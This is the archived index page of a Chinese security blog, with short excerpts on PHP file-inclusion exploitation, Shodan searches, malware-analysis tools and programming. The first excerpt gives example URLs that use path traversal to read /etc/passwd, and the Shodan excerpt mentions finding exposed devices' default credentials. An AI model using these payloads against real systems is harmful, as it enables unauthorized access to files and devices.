由于个人对网站规划变更，网站最新文章可以通过http://blog.ourren.com进行阅读，本博客用于存放原来的旧文，请读者更新RSS地址，非常感谢~

1、文件包含利用

通过传递本地或者远程的文件(allow_url_fopen开启)作为参数进行利用，可以读取敏感信息、执行命令、GetWebshell.

Type of call:
require($file);

Exploit:
http://host/?file=/etc/passwd

Type of call:
require(“includes/”.$file);

Exploit:
http://host/?file=../../../../../etc/passwd

Tpye of calls:
require(“languages/”.[......]

阅读全文

1、关于SHODAN
SHODAN是一个搜索计算机信息的引擎。它不同于抓取网页内容的谷歌或者Bing，基于端口和header头进行抓取信息。目的在于搜索特定硬件设备比如说桌面系统、服务器、路由、交换机等。
2、基本操作
搜索引擎包含如下的过滤规则：
country(国家地区)、hostname(特定域名或者主机名)、net(IP地址)、os(系统)、port(端口)。
example:
apache hostname:.google.com
同时还可以提供导出功能。
3、技巧
内容：查看未授权设备的配置信息，查看设备的默认用户名和密码，唯一的配置信息。
前提知识：了解htt[......]

阅读全文

对2012年技术方面的一个计划。
上半年
1、深入研究PHP源码审计。
2、深入研究android安全，总结出自己分析方法和编写Bot。
3、复习漏洞调试分析与利用技术，并针对各种技术做相应的技术总结。
4、对WEB安全技术进行总结。
4、远控相关技术研究与编写。
下半年
1、找个安全方面的理想工作。
2、待添加

系统基于ubuntu11.10二次组装，采用虚拟机方式发放，集成了众多恶意样本分析工具，主要包含：

• Volatility Framework 2.0 for memory forensics with the latest malware and timeliner modules
• Origami Framework 1.2.3 for PDF analysis, including pdfcop, pdfextract, pdfwalker, pdfsh, etc.
• Network analysis: NetworkMiner, ngrep, pdnstool
• PDF a[......]

阅读全文

网上现在已有两种方式利用C、C++对mysql进行操作，在此总结一下，方面以后使用。

1、mysql++

这个是第三方开发者提供的，最新版是3.1，但是如果你要用VC6.0进行开发的话就只能用1.7版本了。

写了个函数封装了下相关函数，使用前需要注意：

记得include mysql++自带的include目录(工具-选项-目录)，另外还要包含lib文件夹，复制libmySQL.dll到工程目录或者系统目录。

操作实例：

#include “winsock.h”
#include “mysql.h”
#include

#pragma commen[......]

阅读全文

1、工具介绍

业余写了一个小工具，旨在对各类字符进行编码、解码。涉及了MD5、Ascii、注入、跨站等多种方式的编解码。现有编解码方式有：

URL

HTML Ascii Ascii:Xss Ascii:Oracle Ascii:Mysql Ascii:Mssql
Escape Hex:Ascii Hex:Ascii:Xss Hex:Unicode Hex:Ascii:Sql Hex:Unicode:Sql MD5:16 MD5:32 Base64[......]

阅读全文

此文用于收集浏览器框架、与安全性相关总结文章，旨在从整体上把握浏览器所涉及的安全。

1、How Browsers Work:Behind the Scenes of Modern Web Browsers   详细介绍浏览器的工作流程

2、Browser Security Comparison: A Quantitative Approach 从浏览器框架，数据处理，插件安全，安全防护等方面对常见浏览器进行对比分析。

3、Understanding Firefox and SQLite Tables for Computer Forensics 详细介绍Firefox自带的S[......]

阅读全文

此文主要收集编程中一些常用的库和类。

常用库

• 正则表达式：Boost 
• XML操作：Tinyxml CMarkup
• udp 2 tcp：udt

常用类

• URL编解码：文章
• 好的界面：文章
• IOCP：文章1  文章2

更多期待….